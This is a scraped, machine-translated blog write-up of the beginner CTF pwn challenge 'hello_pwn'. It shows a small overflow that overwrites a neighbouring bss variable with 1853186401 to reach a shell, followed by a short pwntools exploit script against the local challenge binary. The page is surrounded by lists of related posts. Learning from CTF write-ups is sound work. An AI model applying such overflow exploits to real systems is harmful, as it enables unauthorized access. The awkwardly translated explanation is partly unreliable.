Offense and defense in the world _pwn_hello_pwn (Meng new version) - Code World

Offense and defense in the world _pwn_hello_pwn (Meng new version)

Language 2020-02-24 17:02:38 views: null

Starting to blog: Portal

0x00 Foreword

file checksec has been omitted. 64 elf program

0x10 steps

0x11 main function

In the main function, we can see that it allows us to enter value unk_601068, and if we want getshell, then we need to dword_60106c value assigned to 1,853,186,401.

0x11 bss segment observation

You can see from these two data it is not far away, so when we entered the first time a two-point values, we will be able to enter four unrelated data, and then packaged value of 1,853,186,401 issued dword. I.e. payload is a payload = 'a' * 4 + p64 (1853186401)

0x20 exp

from pwn import *
sh = process("./hello_pwn")
payload = 'a'*4+p64(1853186401)
sh.recvuntil("bof")
sh.sendline(payload)
sh.interactive()

TedLau_W

Published 15 original articles · won praise 1 · views 252

Private letter concerns

Guess you like

Origin blog.csdn.net/qq_30204577/article/details/104480466

Offense and defense in the world _pwn_hello_pwn (Meng new version)

Offense and defense in the world -pwn-level0

Offense and defense in the world -Hello, CTF- hex

crackme --- offense and defense in the world

Offense and defense in the world --maze

Offense and defense in the world --Shuffle

Offense and defense in the world --crackme

Offense and defense in the world -evil

Offense and defense in the world --key

Offense and defense in the world | string

Offense and defense in the world forgot

Offense and defense in the world | CGfsb

MISC offense and defense in the world

Offense and defense in the world --hackme

WriteUp-adworld (offense and defense in the world) -pwn novice area -level3

Offense and defense in the world web articles

Offense and defense in the world - Miscellaneous -Misc

Offense and defense in the world reverse babymips

Offense and defense in the world simple - js

Offense and defense in the world reverse BABYRE

pwn learning (1) Attack and defense world-hello_pwn

XCTF offense and defense in the world of Web WriteUp

Offense and defense in the world --open-source

app1 ---- offense and defense in the world

Offense and defense in the world reverse tt3441810

Offense and defense in the world resver catch-me

Offense and defense in the world --dmd-50

Offense and defense in the world xff_referer

Offense and defense in the world --The_Maya_Society

Offense and defense in the world Web_backup

Recommended

Rushing to the GitHub hot list——How can open source programming languages and frameworks be so cute?

Beijing Humanoid Robot Innovation Center launches Tiangong, the world's first full-size humanoid robot with purely electric drive for anthropomorphic running

Ranking

8个无需编写代码即可使用 Python 内置库的方法

Java collections interview knowledge Lite

Machine learning algorithms foundation - Introduction a (watermelon materials for the book)

(Easy) Ransom Note - LeetCode

[Five days] Qt from entry to actual combat: the second day

Remember once extremely pit father can not download Maven Jar package of issues: IDEA question

The minimum cost Shortest

OSPF study map (the most complete version)

Network Takeaways

GnuPG

Daily

More

2024-04-27(29)

2024-04-26(22)

2024-04-25(32)

2024-04-24(30)

2024-04-23(30)

2024-04-22(5)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)